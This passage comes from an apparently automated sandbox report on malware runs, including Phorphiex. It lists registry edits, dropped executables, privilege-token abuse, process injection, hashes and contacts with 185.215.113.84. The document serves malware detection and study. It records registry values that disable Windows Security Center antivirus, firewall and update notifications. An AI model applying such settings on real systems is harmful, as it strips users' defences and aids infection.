| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe
"C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe"
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:952 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:992 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/1464-54-0x0000000075B51000-0x0000000075B53000-memory.dmp
\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/1528-57-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{960EF201-3F0D-11ED-809F-FE8152C730B7}.dat
| MD5 | f50f3192913eef549423b89180621a5a |
| SHA1 | aed9ea0e18f863329c10175cb7f24eca1c2ff9e9 |
| SHA256 | fee756cd93bca97007f04e4df730539fdff53a385aa8d6f2f49dd3a29152e803 |
| SHA512 | 27ed4d15566365527ec16adbb96ab59e340508c442c0b6224bacee5db5d768052759249c93456e23b200ee74b7f277ad975693b88514afc7e3f8d0e4ed57f2db |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{960C8101-3F0D-11ED-809F-FE8152C730B7}.dat
| MD5 | b8270fe68fbfcbde4acb9a9fbc2a874a |
| SHA1 | 21aea29a49bd0d3b1a0471c3218ac46725610047 |
| SHA256 | b3b4a6cc34a267a70a41b669acb17c20f03a12701a61f075809a485e0fc4fc0b |
| SHA512 | fe76351e72a7cfbcd244416bb315f0ac18a450c0e6aa573c75160b4dd58c411805d8de440f610aa64cd0edcd4c9507fe503ef0238762109d6d25ed134cd938ff |
memory/1464-61-0x0000000000140000-0x0000000000161000-memory.dmp
memory/1528-63-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1464-62-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1528-64-0x0000000000400000-0x000000000045D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VS2F9PJN.txt
| MD5 | d2752fe1ba9ffde5596d84826382bbd1 |
| SHA1 | 9e63e4aa8b0c248df3ef0853ae38200325e891ce |
| SHA256 | 98f709a20931799c88e2fca9953369f44f5ae37c228a7d8aa276aaa55e07849a |
| SHA512 | 52022ac3d87d42730ac6c4197c61d4ed56491978c8b9ee0070901c476a5b0f5aedced0f7ecc9fe87075e80c98f5f6f58176d9c25aed248a82564019ca5f15de1 |
Analysis: behavioral7
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
120s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{962E12C1-3F0D-11ED-AD72-5E7A81A7298C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{962E39D1-3F0D-11ED-AD72-5E7A81A7298C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371121309" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe
"C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe"
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1892 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2016-54-0x0000000075A71000-0x0000000075A73000-memory.dmp
\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/1128-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/2016-60-0x0000000000260000-0x00000000002BD000-memory.dmp
memory/2016-61-0x0000000000260000-0x00000000002BD000-memory.dmp
memory/2016-59-0x0000000000B70000-0x0000000000B91000-memory.dmp
memory/1128-62-0x0000000000400000-0x000000000045D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{962E39D1-3F0D-11ED-AD72-5E7A81A7298C}.dat
| MD5 | 33be23a4b42425b03e02c4ce38a411f0 |
| SHA1 | ef70ab30d305b07410c6c12402c71569794e1074 |
| SHA256 | d3e07bad00b9edb23c7dd1963772a81bae305b1a48d5b79238aa781f30471bdf |
| SHA512 | e1d1643ec3aa03d45e134061a383d138d54a81a47ee2fc5d19362ee8c5fdd9c5d90fee6ecdf76fea59bf6bdd90e45b2ea4d4adf6f46bcf053719508bf22754f6 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{962E12C1-3F0D-11ED-AD72-5E7A81A7298C}.dat
| MD5 | 43940b572d9dc63bac09d3e4c0752efc |
| SHA1 | 6a93a6e358592609e61d43e17693ec8ba5f7adf4 |
| SHA256 | 96bc631bade5c6f4abca08f3d15ce3a2575b9af6854915a5f3d12a28182f0092 |
| SHA512 | 66afd932f900dc260295421255737cf2fe735e6047c268683bd37e8d83bcdfbe5ad817bc93fbb354bb4217a1ea9e4ae05797ab356928f2376a0d76b058ce6706 |
memory/1128-65-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2016-66-0x0000000000260000-0x00000000002BD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2U1GSVF2.txt
| MD5 | 917b73aae0026a1518c39377f76da41f |
| SHA1 | 62a69ac2baacbfdfa979fe88a503321fce30582f |
| SHA256 | 88e4fee1c7144793486d42d33b50d37d654854cf2a7ff2ca8075912611353b31 |
| SHA512 | 68cddf29a0d55e2fe25a7608cf5fd5bf1ac45be96528cb7fc3e407388205c3d9dc249575e4c232d01611e8238508a285a082d70b8bcc72ffbf1390ca9f602778 |
Analysis: behavioral10
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
153s
Max time network
154s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2306424816.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
